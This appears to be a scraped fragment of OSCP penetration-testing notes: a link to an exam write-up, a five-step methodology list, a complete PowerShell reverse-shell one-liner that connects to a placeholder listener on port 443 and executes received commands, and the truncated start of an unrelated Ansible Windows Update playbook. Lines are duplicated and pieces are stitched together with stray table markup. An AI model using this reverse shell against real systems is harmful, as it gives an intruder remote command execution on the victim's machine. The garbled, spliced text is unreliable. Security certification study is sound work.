UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
- Recon
- Find vuln
- Exploit
- Escalate
- Document it
UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
--- | |
# Ansible playbook to run Windows Update and restart, if required | |
# | |
# http://docs.ansible.com/ansible/win_updates_module.html | |
# https://docs.ansible.com/ansible/win_reboot_module.html | |
- name: Windows Update | |
hosts: all | |
gather_facts: false | |
tasks: |